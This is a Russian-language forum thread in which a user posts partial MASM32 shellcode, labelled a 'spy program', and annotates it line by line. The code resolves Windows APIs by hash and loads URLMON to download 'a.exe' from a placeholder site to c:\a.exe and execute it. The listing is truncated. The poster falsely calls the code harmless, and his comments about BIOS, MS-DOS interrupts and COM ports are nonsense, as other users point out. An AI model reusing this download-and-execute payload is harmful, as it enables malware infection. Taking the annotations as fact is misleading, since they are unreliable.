Шпионская прога

[djonatan98]

Шпионская рограмма, прошу модераторов не закрывать тему, данный код не вредит компьютеру, я проверял его,специально отключил антивирус,программа скачивает dll-ки

Привожу исходник
[GODE]

Програма выполняет следующее

.586
.model flat,stdcall
option casemap:none

include c:\masm32\include\windows.inc Тут подключаются необходимые библиотеки
include c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib


.data Секция дата используется для перессылки данных
shelldatabuffer db 1024 dup(0) резервируется 1024 байта
shellcodebuffer db 2046 dup(0) резервируется 2046
downshell db 'down exploit',0 функция которая используется для загрузки библиотек ядра
.code
start:
invoke MessageBoxA,0,offset downshell,offset downshell,1 отправка собщения об успешной загрузке
invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256 Поиск точек входа в системный процесс для связки с dll- библиотекой
mov eax,offset shellcodebuffer получения дескриптора указывающего на 00401040H адресс dll и сохранение в регистре eax
jmp eax оператор перехода с сохранением на текущей указатель
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h ,90h,90h,90h,90h,90h,90h,90h,90h,90 h - объявляет службе BIOS - усройство занято(диск c)
@@shellcodebegin:
call @@beginaddr - создание таблицы прямого доступа(хеш-таблицы) - для поиска

@@beginaddr:
PUSH 03H - функция прерывания
jmp @@realshellcode передача управления рограмме и сохранение состояния регистров и флагоф(сохранения состояния вычислительной системы)
myExitProcess dd 073e2d87eh адресс завершения процесса
myWinExec dd 00e8afe98h Запуск заданной прилкдной программы
myLoadLibraryA dd 0ec0e4e8eh адресс загружемого модуля
dll db 'URLMON',0,0
myUrlDownFile dd 0702f1a36h загрузка файла в %SYSTEMROOT%, то есть загружаемы модуль получает дескриптор процесса dll-ки для установки точки входа
и связывается с dll - блиотекой и выполняет ее загрузку в %SYSTEMROOT%
path db 'c:\a.exe',0 возвращает текущей путь, после оплучения указателя EDI на начало исполняемого модуля
url db 'http://www.сайт/a.exe',0 сайт с которого произвести загрузку dll-ки

@@realshellcode:
POP ECX обнуления регистра ECX - это функция соглашения ранне вызванных и сохраненных функции и EDI
POP EDI
SCASD ;edi+4 замена адресса, задается смещение в 4 байти, относительно начального адресса указателя на модул
db 67h,64h,0A1h,30h,00h
mov eax, [eax+0cH] вызова функции перехвата вектора обработки пользовательских прерыванй,посредством рерывания 0CH смещается относительно , регистра eax
mov esi, [eax+1cH] релизует низкоуровневый перехват системного таймера, вызвывая блокировку прерываний контроллера в режиме ядра, записваются в регистре eax cо смещением,
lodsd перписывает байт,чей адресс впамяти определяется парой регистров DS:SI в регистре al
mov ebp, [eax+08H] со смещением, отонсительно eax mov загружает перехваченную функцию перехвата прерывания для доступа к ntoskrnl.exe, где сосредоточеня ядерные функции(блокируются прерывания MS-DOS) + смещение относительно
@@next2:
PUSH ECX
@@next3:
MOV ESI,[EBP+3Ch] Прерывание MS-DOS, команда открытия созданного файла(исполняемого модуля в дирректории C:\a.exe',0 ) - смещение по EBP
MOV ESI,[EBP+ESI+78h] команды прерываний для COM - порта, используются дли синхронизации клиент-сервеных процессов,записываются со смещением по двум регистрам EBP+ESI
ADD ESI,EBP
PUSH ESI установка укаателя на исполняемый модуль ESI
MOV ESI,[ESI+20h] указател на завершения программы
ADD ESI,EBP смещение на указатель ESI односительно регистра EBP (операция сдвига)
XOR ECX,ECX
DEC ECX
@@next:
INC ECX
LODSD
ADD EAX,EBP повторная операция сложения(сдвига), указатель наисполняемую программу установлен по адресу EAX
XOR EBX,EBX обнуление регистров
@@again:

[p51x]

смысл данной темы какой?

[djonatan98]

Просто описал функционал даной программы

[p51x]

так я и спрашиваю - нафига это на форуме?

[djonatan98]

Ну во первых не уверен. что правильно описал дельта смещение по адресу 03ch,хотел уточнить правильно ли я описал функционал,программа компилируется работает

[Goodwin98]

Во-первых прога тупо не о конца здесь, во-вторых не оформлена боле мнее нормальным образом, в-третьих на вопрос "на кой она здесь нужна?" так и не было ответа.

[Rock-n-Rolla]

во-первых, комментарии полный бред
во-вторых, программу писал кто-то другой http://www.google.ru/#sclient=psy-ab...gc.r_pw.&cad=b
зачем он сюда её выложил, да ещё и наркоманскими коментариями совершенно не понятно

большая часть программы (та, которая с наркоманскими коментариями) реализует защиту от эмуляции, в конце должен быть ещё один кусок который собственно осуществляет закгрузку файла из интернета

[djonatan98]

Я не претендую на точность, так как не писал такие программы, просто решил изучить структуру кода

[djonatan98]

Что не так в коментариях-?

[djonatan98]

Удаляю тему,лучше найду материал по интересней